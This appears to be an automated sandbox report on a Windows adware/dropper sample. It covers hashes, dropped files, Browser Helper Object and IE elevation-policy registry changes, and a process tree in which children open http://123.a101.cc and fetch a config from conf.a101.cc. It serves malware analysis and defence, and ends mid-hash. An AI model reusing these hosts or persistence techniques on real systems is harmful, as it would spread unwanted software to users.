Analysis
-
max time kernel
153s -
max time network
172s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
26-11-2022 23:09
Static task
static1
Behavioral task
behavioral1
Sample
e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe
Resource
win7-20220812-en
General
-
Target
e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe
-
Size
1.8MB
-
MD5
8da4fe89fb206d881168a65d45d39efc
-
SHA1
1ccfb971125c5bac6f52638bfbb6daa3b42960af
-
SHA256
e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c
-
SHA512
28557fcff7de0a3f8408b5cce56dabbbe3fd90fee70000a2f0680b730491de6596fd715e0fe2627941300798dd90e1d6d973d919a8b50678b624374e5f78c4c1
-
SSDEEP
24576:jmJQBePejfNGkCNwywvFYez/+YeyC1xfNPEqeB1+sbR8qkQ96A0eXa2jnNYIhM/O:jFffNzYi/mY+rfNPEB1zbHkQNtjQAFB
Malware Config
Signatures
-
Executes dropped EXE 6 IoCs
pid Process 3952 kuaibo.exe 3928 qvodupdate.exe 384 qvodkunbang.exe 5076 BaiduP2PService.exe 3356 sr.exe 3852 BaiduP2PService.exe -
resource yara_rule behavioral2/files/0x0006000000022e64-134.dat upx behavioral2/files/0x0006000000022e64-135.dat upx behavioral2/memory/3952-136-0x0000000000400000-0x00000000004B6000-memory.dmp upx -
Loads dropped DLL 15 IoCs
pid Process 1780 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 3928 qvodupdate.exe 3928 qvodupdate.exe 384 qvodkunbang.exe 384 qvodkunbang.exe 5076 BaiduP2PService.exe 5076 BaiduP2PService.exe 5076 BaiduP2PService.exe 5076 BaiduP2PService.exe 5076 BaiduP2PService.exe 3852 BaiduP2PService.exe 3852 BaiduP2PService.exe 3852 BaiduP2PService.exe 3852 BaiduP2PService.exe 3852 BaiduP2PService.exe -
Installs/modifies Browser Helper Object 2 TTPs 6 IoCs
BHOs are DLL modules which act as plugins for Internet Explorer.
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects qvodupdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\NoExplorer = "1" qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{1FD49718-1D00-4B19-AF5F-070AF6D5D54C} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\BROWSER HELPER OBJECTS\{31D09BA0-12F5-4CCE-BE8A-2923E76605DA} qvodupdate.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe -
Drops file in Program Files directory 18 IoCs
description ioc Process File created C:\Program Files (x86)\tools\P2PStatReport.dll qvodkunbang.exe File created C:\Program Files (x86)\tools\P2SBase.dll qvodkunbang.exe File opened for modification C:\Program Files (x86)\QvodPlayer\isWrite\ e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File opened for modification C:\Program Files (x86)\QvodPlayer\ e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodupdate.exe File opened for modification C:\Program Files (x86)\tools\isWrite\ qvodkunbang.exe File created C:\Program Files (x86)\tools\sr.exe qvodkunbang.exe File created C:\Program Files (x86)\QvodPlayer\kuaibo.exe e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File created C:\Program Files (x86)\tools\tools.exe qvodupdate.exe File opened for modification C:\Program Files (x86)\tools\ qvodkunbang.exe File created C:\Program Files (x86)\tools\BaiduP2PService.exe qvodkunbang.exe File opened for modification C:\Program Files (x86)\Browser\config.ini qvodkunbang.exe File created C:\Program Files (x86)\QvodPlayer\tools.exe e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File created C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File opened for modification C:\Program Files (x86)\Browser\config.ini qvodupdate.exe File opened for modification C:\Program Files (x86)\tools\ qvodupdate.exe File created C:\Program Files (x86)\QvodPlayer\qvodupdate.exe e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe File created C:\Program Files (x86)\tools\P2PBase.dll qvodkunbang.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 6036c8118502d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4153878246" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30999172" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000970cb69d285d8146b71c0da789a61d4b00000000020000000000106600000001000020000000430da0611699a811012b0fa8694de5f1e16f3f41ce8ad88de033eba79d764e3c000000000e80000000020000200000008d427b1e1c30d8912b729d13829b2142febdc4d708f57afeeba35aa5e488dfd02000000080515a7a4ffebfe5998d998824dd7c94fdf5859110063a1a21aa31098cb98cb6400000002771cd257fc7214930e1a8c7ab5429a6092a4ae184250be20b48eeaee0d4c68196d350b5374cf049d17258318edf03d606fc7ffc81597025ab37a514fc5f41f6 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 60e0290b8502d901 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30999172" iexplore.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0} BaiduP2PService.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppPath = "C:\\Program Files (x86)\\tools" BaiduP2PService.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "4147940377" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000970cb69d285d8146b71c0da789a61d4b000000000200000000001066000000010000200000005a24a477b9a1d4d469f23aa531a9f8c6a0badd3c815c37905eca27ef811843dd000000000e8000000002000020000000b23c22ef60c2187d95e184d447d55f1763cdf66f6ebd09eb7866da798c514fd620000000ef106a52bd56c8f5e1cc5b427ae2a3c34a743f8c2a93affa5896752e19403e864000000023c522424ec8f59bb06de61199e64c64f4e4134d19ce209e512bdfd395786d95e332211c3b89d36bf58a10ccfa7ec000bf4f5a7959c450d6172b03753aeaec61 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30999172" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4153878246" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\Policy = "3" BaiduP2PService.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30999172" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{1F08A53C-6E78-11ED-89AC-E62D9FD3CB0B} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}\AppName = "BaiduP2PService.exe" BaiduP2PService.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "4147940377" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376334761" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Modifies registry class 4 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\ = "AccountProtect Class" qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32 qvodupdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32\ = "C:\\ProgramData\\tools\\bdmanager.dll" qvodupdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1} qvodupdate.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 3928 qvodupdate.exe 3928 qvodupdate.exe 3928 qvodupdate.exe 3928 qvodupdate.exe 384 qvodkunbang.exe 384 qvodkunbang.exe 384 qvodkunbang.exe 384 qvodkunbang.exe 384 qvodkunbang.exe 384 qvodkunbang.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 768 iexplore.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3928 qvodupdate.exe Token: SeDebugPrivilege 3928 qvodupdate.exe Token: SeDebugPrivilege 384 qvodkunbang.exe Token: SeDebugPrivilege 384 qvodkunbang.exe Token: SeDebugPrivilege 384 qvodkunbang.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3952 kuaibo.exe 3952 kuaibo.exe 768 iexplore.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3952 kuaibo.exe 3952 kuaibo.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 768 iexplore.exe 768 iexplore.exe 4616 IEXPLORE.EXE 4616 IEXPLORE.EXE 4616 IEXPLORE.EXE 4616 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 1780 wrote to memory of 3952 1780 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 80 PID 1780 wrote to memory of 3952 1780 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 80 PID 1780 wrote to memory of 3952 1780 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 80 PID 1780 wrote to memory of 3928 1780 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 83 PID 1780 wrote to memory of 3928 1780 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 83 PID 1780 wrote to memory of 3928 1780 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 83 PID 3928 wrote to memory of 768 3928 qvodupdate.exe 84 PID 3928 wrote to memory of 768 3928 qvodupdate.exe 84 PID 768 wrote to memory of 4616 768 iexplore.exe 85 PID 768 wrote to memory of 4616 768 iexplore.exe 85 PID 768 wrote to memory of 4616 768 iexplore.exe 85 PID 1780 wrote to memory of 384 1780 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 87 PID 1780 wrote to memory of 384 1780 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 87 PID 1780 wrote to memory of 384 1780 e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe 87 PID 384 wrote to memory of 5076 384 qvodkunbang.exe 90 PID 384 wrote to memory of 5076 384 qvodkunbang.exe 90 PID 384 wrote to memory of 5076 384 qvodkunbang.exe 90 PID 384 wrote to memory of 3356 384 qvodkunbang.exe 92 PID 384 wrote to memory of 3356 384 qvodkunbang.exe 92 PID 384 wrote to memory of 3356 384 qvodkunbang.exe 92 PID 384 wrote to memory of 3852 384 qvodkunbang.exe 93 PID 384 wrote to memory of 3852 384 qvodkunbang.exe 93 PID 384 wrote to memory of 3852 384 qvodkunbang.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe"C:\Users\Admin\AppData\Local\Temp\e4a0eee14546d31d95c0c1d1638cd75bc4b6124928a9e2b5d1e1e9de0658909c.exe"1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:1780 -
C:\Program Files (x86)\QvodPlayer\kuaibo.exe"C:\Program Files (x86)\QvodPlayer\kuaibo.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3952
-
-
C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"C:\Program Files (x86)\QvodPlayer\qvodupdate.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Installs/modifies Browser Helper Object
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3928 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://123.a101.cc/u.php?id=893⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:768 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:768 CREDAT:17410 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:4616
-
-
-
-
C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"C:\Program Files (x86)\QvodPlayer\qvodkunbang.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:384 -
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe" init3⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies Internet Explorer settings
PID:5076
-
-
C:\Program Files (x86)\tools\sr.exe"C:\Program Files (x86)\tools\sr.exe" "http://conf.a101.cc/tool/install.txt" "C:\ProgramData\Baidu\BaiduPlayer\3⤵
- Executes dropped EXE
PID:3356
-
-
C:\Program Files (x86)\tools\BaiduP2PService.exe"C:\Program Files (x86)\tools\BaiduP2PService.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3852
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
408KB
MD5d8b7c3af2f63db6cc542273e192b1d02
SHA134b9d8be2c314ae099b3f825b801a78b608dec26
SHA2566d56acd63ab77f03feb92e8499b42df24388677e7e2bbbfeb2ff706d4a7550b9
SHA5124b27ac2b324ad5d0aecc8eb64a1f055f9b16837570efe43198dce1d2f5809fcbd104ac39563ea32066990fb0fb34ab85ddf072c4f5ef283c052b742c6a4e675b
-
Filesize
408KB
MD5d8b7c3af2f63db6cc542273e192b1d02
SHA134b9d8be2c314ae099b3f825b801a78b608dec26
SHA2566d56acd63ab77f03feb92e8499b42df24388677e7e2bbbfeb2ff706d4a7550b9
SHA5124b27ac2b324ad5d0aecc8eb64a1f055f9b16837570efe43198dce1d2f5809fcbd104ac39563ea32066990fb0fb34ab85ddf072c4f5ef283c052b742c6a4e675b
-
Filesize
758KB
MD558048a500b343f8cf45b9ba298bbf2ba
SHA108cefa1fcef16ac545a220c2eb6e299f90917bfe
SHA256c4d1fea25898b46e1e5570c932ba1d4f3de0c8002534c5ac02f4fdee5ff55d4d
SHA5126493e84daaadcc866a97f631af6a0af023e82fedf898bae6e91f5919a1caeb3ca11ad219756e9d548c0f180ac2192a8032c944d25ec49d0285b4cefa5a4e4bd0
-
Filesize
758KB
MD558048a500b343f8cf45b9ba298bbf2ba
SHA108cefa1fcef16ac545a220c2eb6e299f90917bfe
SHA256c4d1fea25898b46e1e5570c932ba1d4f3de0c8002534c5ac02f4fdee5ff55d4d
SHA5126493e84daaadcc866a97f631af6a0af023e82fedf898bae6e91f5919a1caeb3ca11ad219756e9d548c0f180ac2192a8032c944d25ec49d0285b4cefa5a4e4bd0
-
Filesize
421KB
MD57bf0ed680b14fd3ca5684d3774d1e79d
SHA15d5bbabe3cce42137b86e61cc8d05edce1b327d8
SHA256a119be9d9ccbea4ec8fbbd61f52b62da58e21d817eaab40ba923530c96d1f980
SHA5120e7e966b6b19bdc99eede9172f50d2ac4bc6e7bb6cfbc1e2ad3da5908905179d565181faca43e6cc1d308520568b716877f17f4ed9bb33721e9290c3ecf10196
-
Filesize
421KB
MD57bf0ed680b14fd3ca5684d3774d1e79d
SHA15d5bbabe3cce42137b86e61cc8d05edce1b327d8
SHA256a119be9d9ccbea4ec8fbbd61f52b62da58e21d817eaab40ba923530c96d1f980
SHA5120e7e966b6b19bdc99eede9172f50d2ac4bc6e7bb6cfbc1e2ad3da5908905179d565181faca43e6cc1d308520568b716877f17f4ed9bb33721e9290c3ecf10196
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
508KB
MD5012a8879efa6f8dbc3c6ba58a659fefb
SHA1d2a2dac321ff5a78de52e926044ba362f4004cde
SHA256774839fe17e1ff94e45a21e6c1ac3c884e8fa0a3cb5ef24e9b8ae503d70dfa66
SHA512b0f060cd5231f255083e2437026488d5fa3493e97cebb83a4638680551299db1a01862ca433d52efa8ecff80aa6ba5982cdd015a9f5081364b80ee92b79b78ba
-
Filesize
496KB
MD5a86a90ba120c455ac0e3655f146d5a0f
SHA1277c55191fbbadf888626df4fba279591632a406
SHA256577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43
SHA512a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47
-
Filesize
496KB
MD5a86a90ba120c455ac0e3655f146d5a0f
SHA1277c55191fbbadf888626df4fba279591632a406
SHA256577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43
SHA512a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47
-
Filesize
496KB
MD5a86a90ba120c455ac0e3655f146d5a0f
SHA1277c55191fbbadf888626df4fba279591632a406
SHA256577790026b949f666546299cd1dd002bc76447b86feed056cfe8c903a8039c43
SHA512a1d1d9386575187a81867db036c59ce76cede87a981fec7462283ccc0f76e0e8c8a85c6e66fd74a4305b6f402c224db9c1525e22015a4400d0bbedd1c72a9d47
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
364KB
MD53b14cae0ea1d045bb5b196017913edb3
SHA17ca456595148f2d5e71444a612f2351c4cd8a20d
SHA256a2aeac1855ccb0bab911ddbfd7c79e86834020dc3c260a335249d41aff594982
SHA5126c475600f041c229f8fb330e201f658db58f1a46f016731e64cf65cee64242876c7b71aef671532f41106cc35de9963b599eb39b63e1d980ef911392fbf0a200
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
SHA256687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb
SHA51226a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
SHA256687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb
SHA51226a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
SHA256687df23126f0da0348f8c5165b11b72982636177c6f53f5fe827c3f036fd83bb
SHA51226a78e26a60bfd48e93b1e61ede2cc2a7c9c9cb61bdd729f86b2692fed0eb4fedc72953ca83bc3fc945a0cc21d3d3232e73a03be39ea5755ddcc0dbd8ef3bed3
-
Filesize
512KB
MD5894ab861e608eacbac24280ab234368f
SHA1e283ef8757f04b0252ec5dce22e6e8094bed7737
